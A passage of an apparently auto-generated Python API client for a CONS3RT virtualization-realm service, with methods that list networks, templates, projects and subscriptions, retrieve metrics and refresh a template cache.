                                  ('include_subscriptions', 'include_subscriptions')):
        attr_value = local_var_params.get(attr_name)
        if attr_value is not None:
            query_params.append((query_name, attr_value))  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalCons3rtTemplateData]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_unregistered_networks(self, id, **kwargs):  # noqa: E501
    """List Unregistered Networks  # noqa: E501

    Returns a collection of the unregistered, back-end Networks in the
    specified Virtualization Realm.  Synchronous by default; pass
    async_req=True to get a request thread instead:

    >>> thread = api.get_unregistered_networks(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: list[Subnet]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_unregistered_networks_with_http_info(id, **forwarded)  # noqa: E501
def get_unregistered_networks_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Unregistered Networks  # noqa: E501

    Returns a collection of the unregistered, back-end Networks in the
    specified Virtualization Realm.  Synchronous by default; pass
    async_req=True to get a request thread instead:

    >>> thread = api.get_unregistered_networks_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(list[Subnet], status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_unregistered_networks" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id',):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_unregistered_networks`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/networks/unregistered', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Subnet]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_virtual_machine_count_metrics1(self, id, start, end, **kwargs):  # noqa: E501
    """Retrieve Virtual Machine Metrics  # noqa: E501

    Returns metric data for Virtual Machines launched into the specified
    Virtualization Realm.  Synchronous by default; pass async_req=True to
    get a request thread instead:

    >>> thread = api.get_virtual_machine_count_metrics1(id, start, end, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param int start: Interval start time, specified in seconds since epoch (required)
    :param int end: Interval end time, specified in seconds since epoch (required)
    :param int interval: Number of intervals
    :param str interval_unit: Interval unit
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: str
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_virtual_machine_count_metrics1_with_http_info(id, start, end, **forwarded)  # noqa: E501
def get_virtual_machine_count_metrics1_with_http_info(self, id, start, end, **kwargs):  # noqa: E501
    """Retrieve Virtual Machine Metrics  # noqa: E501

    Returns metric data for Virtual Machines launched into the specified
    Virtualization Realm.  Synchronous by default; pass async_req=True to
    get a request thread instead:

    >>> thread = api.get_virtual_machine_count_metrics1_with_http_info(id, start, end, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param int start: Interval start time, specified in seconds since epoch (required)
    :param int end: Interval end time, specified in seconds since epoch (required)
    :param int interval: Number of intervals
    :param str interval_unit: Interval unit
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(str, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'start',
        'end',
        'interval',
        'interval_unit',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_virtual_machine_count_metrics1" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id', 'start', 'end'):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_virtual_machine_count_metrics1`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    # Map the python attribute names onto the wire-level query parameter
    # names (interval_unit -> intervalUnit); skip values not supplied.
    query_params = []
    for attr_name, query_name in (('start', 'start'),
                                  ('end', 'end'),
                                  ('interval', 'interval'),
                                  ('interval_unit', 'intervalUnit')):
        attr_value = local_var_params.get(attr_name)
        if attr_value is not None:
            query_params.append((query_name, attr_value))  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/metrics/virtualmachinecount', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_virtualization_realm(self, id, **kwargs):  # noqa: E501
    """Retrieve Virtualization Realm  # noqa: E501

    Returns a single Virtualization Realm by the given ID.  Synchronous by
    default; pass async_req=True to get a request thread instead:

    >>> thread = api.get_virtualization_realm(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: FullVirtualizationRealm
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_virtualization_realm_with_http_info(id, **forwarded)  # noqa: E501
def get_virtualization_realm_with_http_info(self, id, **kwargs):  # noqa: E501
    """Retrieve Virtualization Realm  # noqa: E501

    Returns a single Virtualization Realm by the given ID.  Synchronous by
    default; pass async_req=True to get a request thread instead:

    >>> thread = api.get_virtualization_realm_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(FullVirtualizationRealm, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_virtualization_realm" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id',):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_virtualization_realm`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='FullVirtualizationRealm',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_virtualization_realm_resources(self, id, **kwargs):  # noqa: E501
    """Retrieve Virtualization Realm Resources  # noqa: E501

    Returns the back-end resources for a single Virtualization Realm by the
    given ID.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_virtualization_realm_resources(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: AbstractCloudResources
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_virtualization_realm_resources_with_http_info(id, **forwarded)  # noqa: E501
def get_virtualization_realm_resources_with_http_info(self, id, **kwargs):  # noqa: E501
    """Retrieve Virtualization Realm Resources  # noqa: E501

    Returns the back-end resources for a single Virtualization Realm by the
    given ID.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_virtualization_realm_resources_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: tuple(AbstractCloudResources, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Reject any keyword argument that is not part of the API contract.
    for param_name, param_value in local_var_params.pop('kwargs').items():
        if param_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_virtualization_realm_resources" % param_name
            )
        local_var_params[param_name] = param_value

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        for required in ('id',):
            if local_var_params.get(required) is None:
                raise ApiValueError(
                    "Missing the required parameter `%s` when calling "
                    "`get_virtualization_realm_resources`" % required
                )

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/resources', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='AbstractCloudResources',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_virtualization_realms(self, **kwargs):  # noqa: E501
    """List Virtualization Realms  # noqa: E501

    Returns a collection of the Virtualization Realms that the user
    manages.  Synchronous by default; pass async_req=True to get a request
    thread instead:

    >>> thread = api.get_virtualization_realms(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int maxresults: Maximum number of results to return
    :param int page: Requested page number
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             object without reading/decoding the body.
                             Default is True.
    :param _request_timeout: per-request timeout; a single number for a
                             total timeout, or a (connection, read) pair.
    :return: list[MinimalVirtualizationRealm]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force data-only responses; the *_with_http_info variant returns the
    # full (data, status, headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_virtualization_realms_with_http_info(**forwarded)  # noqa: E501
def get_virtualization_realms_with_http_info(self, **kwargs):  # noqa: E501
    """List Virtualization Realms  # noqa: E501

    Returns a collection of the Virtualization Realms that the user manages.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_virtualization_realms_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int maxresults: Maximum number of results to return
    :param int page: Requested page number
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[MinimalVirtualizationRealm], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict; validated kwargs are
    # flattened into it below.
    local_var_params = locals()

    all_params = ['maxresults', 'page']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_virtualization_realms" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only send query parameters that were explicitly provided.
    query_params = []
    if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None:  # noqa: E501
        query_params.append(('maxresults', local_var_params['maxresults']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalVirtualizationRealm]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def invalidate_template_cache_in_virtualization_realm(self, id, **kwargs):  # noqa: E501
    """Refresh Template Cache  # noqa: E501

    Forces the back-end Template data to be re-read in the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.invalidate_template_cache_in_virtualization_realm(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: bool
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.invalidate_template_cache_in_virtualization_realm_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def invalidate_template_cache_in_virtualization_realm_with_http_info(self, id, **kwargs):  # noqa: E501
    """Refresh Template Cache  # noqa: E501

    Forces the back-end Template data to be re-read in the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.invalidate_template_cache_in_virtualization_realm_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method invalidate_template_cache_in_virtualization_realm" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `invalidate_template_cache_in_virtualization_realm`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/registrations', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='bool',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_pending_template_subscriptions(self, id, **kwargs):  # noqa: E501
    """List Pending Subscriptions  # noqa: E501

    Returns a collection of the pending Template Subscriptions in the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.list_pending_template_subscriptions(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[FullTemplateRegistrationForSubscription]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.list_pending_template_subscriptions_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def list_pending_template_subscriptions_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Pending Subscriptions  # noqa: E501

    Returns a collection of the pending Template Subscriptions in the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_pending_template_subscriptions_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[FullTemplateRegistrationForSubscription], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_pending_template_subscriptions" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `list_pending_template_subscriptions`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/subscriptions/pending', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[FullTemplateRegistrationForSubscription]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_projects(self, id, **kwargs):  # noqa: E501
    """List Projects  # noqa: E501

    Returns a collection of the Projects allowed to access to the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.list_projects(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param int maxresults: Maximum number of results to return
    :param int page: Requested page number
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[MinimalProject]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.list_projects_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def list_projects_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Projects  # noqa: E501

    Returns a collection of the Projects allowed to access to the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_projects_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param int maxresults: Maximum number of results to return
    :param int page: Requested page number
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[MinimalProject], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # NOTE(review): the docstring declares ``id`` as str while sibling
    # endpoints declare int — likely a spec inconsistency; the client
    # does not enforce the type either way.
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id', 'maxresults', 'page']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_projects" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `list_projects`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    # Only send query parameters that were explicitly provided.
    query_params = []
    if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None:  # noqa: E501
        query_params.append(('maxresults', local_var_params['maxresults']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/projects', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalProject]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_template_registrations(self, id, **kwargs):  # noqa: E501
    """List Template Registrations  # noqa: E501

    Returns a collection of the Template Registrations in the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.list_template_registrations(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[MinimalTemplateRegistration]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.list_template_registrations_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def list_template_registrations_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Template Registrations  # noqa: E501

    Returns a collection of the Template Registrations in the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
